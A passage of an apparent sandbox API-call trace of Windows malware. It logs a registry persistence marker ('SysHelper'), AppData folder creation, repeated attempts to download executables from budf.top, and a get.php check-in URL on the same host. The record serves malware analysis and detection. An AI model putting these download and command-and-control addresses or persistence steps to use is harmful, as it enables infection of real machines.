pdwDataLen=0x18e268) returned 1 [0091.905] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x11) returned 0x3180328 [0091.905] CryptGetHashParam (in: hHash=0x31c48f0, dwParam=0x2, pbData=0x3180328, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x3180328, pdwDataLen=0x18e268) returned 1 [0091.905] GetLastError () returned 0x0 [0091.905] CryptDestroyHash (hHash=0x31c48f0) returned 1 [0091.906] CryptReleaseContext (hProv=0x29f850, dwFlags=0x0) returned 1 [0091.906] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31d38c0 | out: hHeap=0x240000) returned 1 [0091.906] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318ed50 [0091.906] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318ed18 | out: hHeap=0x240000) returned 1 [0091.906] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x297388 | out: hHeap=0x240000) returned 1 [0091.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x9bc) returned 0x5d4 [0092.159] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) Thread: id = 80 os_tid = 0x84c Thread: id = 81 os_tid = 0x85c Thread: id = 82 os_tid = 0x86c Thread: id = 83 os_tid = 0x87c Thread: id = 84 os_tid = 0x88c Thread: id = 85 os_tid = 0x89c Thread: id = 86 os_tid = 0x8ac Thread: id = 87 os_tid = 0x8cc Thread: id = 88 os_tid = 0x9ac [0091.772] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x110) returned 0x31a9ef0 [0091.772] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x110) returned 0x3170a30 [0091.772] GetLastError () returned 0x54f [0091.772] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3bc) returned 0x31b1de8 [0091.772] GetCurrentThreadId () returned 0x9ac [0091.772] SetLastError (dwErrCode=0x54f) [0091.772] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x31a28b8 [0091.772] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x18) returned 0x3180328 [0091.772] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x31a2900 [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318eb20 [0091.773] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3180328 | out: hHeap=0x240000) returned 1 [0091.773] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318e928 [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x48) returned 0x31bd8d0 [0091.773] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318eb20 | out: hHeap=0x240000) returned 1 [0091.773] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318eb20 [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x31ce00 [0091.773] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31bd8d0 | out: hHeap=0x240000) returned 1 [0091.773] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318e8b8 [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x90) returned 0x3195a48 [0091.773] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31ce00 | out: hHeap=0x240000) returned 1 [0091.773] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318e768 [0091.773] GetLastError () returned 0x54f [0091.773] SetLastError (dwErrCode=0x54f) [0091.773] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3170a30 | out: hHeap=0x240000) returned 1 [0091.773] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0091.774] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0091.774] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x400) returned 0x31b21b0 [0091.774] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x31b21b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0091.774] UuidCreate (in: Uuid=0x999d768 | out: Uuid=0x999d768) returned 0x0 [0091.817] UuidToStringA (in: Uuid=0x999d768, StringUuid=0x999d6c0 | out: StringUuid=0x999d6c0) returned 0x0 [0091.817] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318eab0 [0091.817] RpcStringFreeA (in: String=0x999d6c0 | out: String=0x999d6c0) returned 0x0 [0091.817] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="91a7ad3e-39a5-4bff-a16c-5a4a88aecf1e" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\91a7ad3e-39a5-4bff-a16c-5a4a88aecf1e") returned 1 [0091.817] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\91a7ad3e-39a5-4bff-a16c-5a4a88aecf1e" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\91a7ad3e-39a5-4bff-a16c-5a4a88aecf1e"), lpSecurityAttributes=0x0) returned 1 [0091.818] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x410) returned 0x31b25b8 [0091.818] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x410) returned 0x319fd80 [0091.818] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1000) returned 0x31a0198 [0091.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x319fd80, cbMultiByte=-1, lpWideCharStr=0x31a0198, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\91a7ad3e-39a5-4bff-a16c-5a4a88aecf1e") returned 81 [0091.818] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1010) returned 0x31d7d68 [0091.818] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a0198 | out: hHeap=0x240000) returned 1 [0091.818] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319fd80 | out: hHeap=0x240000) returned 1 [0091.818] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x18) returned 0x31801e8 [0091.819] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0091.819] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x31a2990 [0091.819] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x860) returned 0x319fd80 [0091.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31a2990, cbMultiByte=-1, lpWideCharStr=0x319fd80, cchWideChar=1072 | out: lpWideCharStr="http://budf.top/files/penelop/updatewin1.exe") returned 45 [0091.819] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x870) returned 0x31a05e8 [0091.819] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319fd80 | out: hHeap=0x240000) returned 1 [0091.819] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a2990 | out: hHeap=0x240000) returned 1 [0091.825] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x870) returned 0x31a0e60 [0091.825] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x319fd80 [0091.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x319fd80, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0091.826] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x840) returned 0x31a16d8 [0091.826] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319fd80 | out: hHeap=0x240000) returned 1 [0091.826] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a0e60 | out: hHeap=0x240000) returned 1 [0091.826] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://budf.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0094.677] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a16d8 | out: hHeap=0x240000) returned 1 [0094.677] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a05e8 | out: hHeap=0x240000) returned 1 [0094.683] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0094.689] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x31a2ab0 [0094.695] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x860) returned 0x319f040 [0094.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31a2ab0, cbMultiByte=-1, lpWideCharStr=0x319f040, cchWideChar=1072 | out: lpWideCharStr="http://budf.top/files/penelop/updatewin2.exe") returned 45 [0094.695] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x870) returned 0x31a03c8 [0094.695] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319f040 | out: hHeap=0x240000) returned 1 [0094.695] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a2ab0 | out: hHeap=0x240000) returned 1 [0094.702] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x870) returned 0x319f040 [0094.702] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x31a0c40 [0094.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x31a0c40, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0094.702] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x840) returned 0x31a1478 [0094.702] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a0c40 | out: hHeap=0x240000) returned 1 [0094.702] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319f040 | out: hHeap=0x240000) returned 1 [0094.702] InternetOpenUrlA (hInternet=0xcc0008, lpszUrl="http://budf.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a1478 | out: hHeap=0x240000) returned 1 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a03c8 | out: hHeap=0x240000) returned 1 [0099.356] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc000c [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318e848 [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x85e) returned 0x2a9fd0 [0099.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318e848, cbMultiByte=-1, lpWideCharStr=0x2a9fd0, cchWideChar=1071 | out: lpWideCharStr="http://budf.top/files/penelop/updatewin.exe") returned 44 [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x860) returned 0x2aa838 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318e848 | out: hHeap=0x240000) returned 1 [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x860) returned 0x2a9fd0 [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x82f) returned 0x31a03c8 [0099.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x31a03c8, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0099.356] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x31a0c00 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a03c8 | out: hHeap=0x240000) returned 1 [0099.356] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0099.356] InternetOpenUrlA (hInternet=0xcc000c, lpszUrl="http://budf.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0101.810] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a0c00 | out: hHeap=0x240000) returned 1 [0101.811] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2aa838 | out: hHeap=0x240000) returned 1 [0101.817] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0101.830] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318e848 [0101.835] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x84e) returned 0x2a9fd0 [0101.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318e848, cbMultiByte=-1, lpWideCharStr=0x2a9fd0, cchWideChar=1063 | out: lpWideCharStr="http://budf.top/files/penelop/3.exe") returned 36 [0101.841] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x2aa828 [0101.841] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0101.841] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318e848 | out: hHeap=0x240000) returned 1 [0101.841] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x2a9fd0 [0101.841] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x827) returned 0x31a03c8 [0101.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x31a03c8, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0101.842] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x31a0bf8 [0101.842] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a03c8 | out: hHeap=0x240000) returned 1 [0101.842] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0101.842] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://budf.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a0bf8 | out: hHeap=0x240000) returned 1 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2aa828 | out: hHeap=0x240000) returned 1 [0104.145] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0014 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318ec00 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x84e) returned 0x31a09f0 [0104.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318ec00, cbMultiByte=-1, lpWideCharStr=0x31a09f0, cchWideChar=1063 | out: lpWideCharStr="http://budf.top/files/penelop/4.exe") returned 36 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31a1248 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a09f0 | out: hHeap=0x240000) returned 1 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318ec00 | out: hHeap=0x240000) returned 1 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31a09f0 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x827) returned 0x2a9fd0 [0104.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x2a9fd0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0104.145] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x2aa800 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0104.145] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a09f0 | out: hHeap=0x240000) returned 1 [0104.145] InternetOpenUrlA (hInternet=0xcc0014, lpszUrl="http://budf.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0106.487] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2aa800 | out: hHeap=0x240000) returned 1 [0106.487] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a1248 | out: hHeap=0x240000) returned 1 [0106.487] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0018 [0106.487] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318edf8 [0106.487] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x84e) returned 0x31a09f0 [0106.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318edf8, cbMultiByte=-1, lpWideCharStr=0x31a09f0, cchWideChar=1063 | out: lpWideCharStr="http://budf.top/files/penelop/5.exe") returned 36 [0106.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31a1248 [0106.488] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a09f0 | out: hHeap=0x240000) returned 1 [0106.488] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318edf8 | out: hHeap=0x240000) returned 1 [0106.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31a09f0 [0106.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x827) returned 0x2a9fd0 [0106.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://budf.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x2a9fd0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://budf.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0106.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x830) returned 0x2aa800 [0106.488] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2a9fd0 | out: hHeap=0x240000) returned 1 [0106.488] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31a09f0 | out: hHeap=0x240000) returned 1 [0106.488] InternetOpenUrlA (hInternet=0xcc0018, lpszUrl="http://budf.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) Thread: id = 89 os_tid = 0x9bc [0092.160] timeGetTime () returned 0x114c227 [0092.160] GetLastError () returned 0x54f [0092.160] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3bc) returned 0x31b00c8 [0092.160] GetCurrentThreadId () returned 0x9bc [0092.160] SetLastError (dwErrCode=0x54f) [0092.160] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfbda5e4 | out: phkResult=0xfbda5e4*=0x5d8) returned 0x0 [0092.160] RegQueryValueExW (in: hKey=0x5d8, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfbda5d8, lpData=0xfbda5e0, lpcbData=0xfbda5dc*=0x4 | out: lpType=0xfbda5d8*=0x0, lpData=0xfbda5e0*=0x0, lpcbData=0xfbda5dc*=0x4) returned 0x2 [0092.160] RegSetValueExW (in: hKey=0x5d8, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfbda5e0*=0x1, cbData=0x4 | out: lpData=0xfbda5e0*=0x1) returned 0x0 [0092.161] RegCloseKey (hKey=0x5d8) returned 0x0 [0092.161] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfbda4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0092.161] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0092.161] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x18) returned 0x3180328 [0092.161] AreFileApisANSI () returned 1 [0092.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbda4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0092.161] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x7a) returned 0x29f850 [0092.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbda4e4, cbMultiByte=-1, lpWideCharStr=0x29f850, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0092.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfbda368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.197] GetLastError () returned 0x2 [0092.197] GetLastError () returned 0x2 [0092.197] SetLastError (dwErrCode=0x2) [0092.197] GetLastError () returned 0x2 [0092.197] SetLastError (dwErrCode=0x2) [0092.197] GetLastError () returned 0x2 [0092.197] SetLastError (dwErrCode=0x2) [0092.205] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x29f850 | out: hHeap=0x240000) returned 1 [0092.206] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x31ced0 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8e) returned 0x3157dd0 [0092.206] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31ced0 | out: hHeap=0x240000) returned 1 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x30) returned 0x318ed18 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x840) returned 0x31b0490 [0092.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318ed18, cbMultiByte=-1, lpWideCharStr=0x31b0490, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x850) returned 0x31b0cd8 [0092.206] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b0490 | out: hHeap=0x240000) returned 1 [0092.206] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x318ed18 | out: hHeap=0x240000) returned 1 [0092.206] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8b0) returned 0x319dee8 [0092.206] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3157dd0 | out: hHeap=0x240000) returned 1 [0092.206] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31b0cd8 | out: hHeap=0x240000) returned 1 [0092.206] lstrcpyW (in: lpString1=0xfbdaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0092.206] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpString2="&first=true" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true" [0092.206] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0097.064] InternetReadFile (in: hFile=0x0, lpBuffer=0xfbda778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfbda604 | out: lpBuffer=0xfbda778, lpdwNumberOfBytesRead=0xfbda604) returned 0 [0097.064] InternetCloseHandle (hInternet=0x0) returned 0 [0097.064] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0097.064] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x319dee8 | out: hHeap=0x240000) returned 1 [0097.064] timeGetTime () returned 0x114d53a [0097.064] timeGetTime () returned 0x114d53a [0097.064] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.065] Sleep (dwMilliseconds=0x64) [0097.170] timeGetTime () returned 0x114d5a7 [0097.170] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.170] Sleep (dwMilliseconds=0x64) [0097.279] timeGetTime () returned 0x114d614 [0097.279] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.279] Sleep (dwMilliseconds=0x64) [0097.390] timeGetTime () returned 0x114d681 [0097.390] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfbda5c8) returned 0 [0097.390] Sleep (dwMilliseconds=0x64) [0097.498] timeGetTime () returned 0x114d6ef [0097.498] PeekMessageW (in: lpMsg=0xfbda5c8, hWnd=0x0, 